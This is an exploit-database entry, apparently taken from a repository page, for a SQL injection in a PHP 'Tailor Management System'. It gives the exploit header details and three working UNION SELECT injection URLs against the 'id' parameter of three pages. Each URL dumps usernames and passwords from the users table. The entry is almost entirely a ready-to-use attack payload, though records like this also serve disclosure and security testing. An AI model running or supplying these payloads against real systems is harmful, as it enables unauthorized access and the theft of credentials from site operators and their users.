73dd822b51
4 changes to exploits/shellcodes Input Director 1.4.3 - 'Input Director' Unquoted Service Path Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH) Tailor Management System - 'id' SQL Injection Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
15 lines
No EOL
740 B
Text
15 lines
No EOL
740 B
Text
# Exploit Title: Tailor Management System - 'id' SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 2020-09-08
|
|
# Exploit Author: mosaaed
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
|
|
# Version: v1.0
|
|
# Tested on: Kali linux
|
|
# CVE: N/A
|
|
|
|
|
|
|
|
http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
|
|
http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
|
|
http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- - |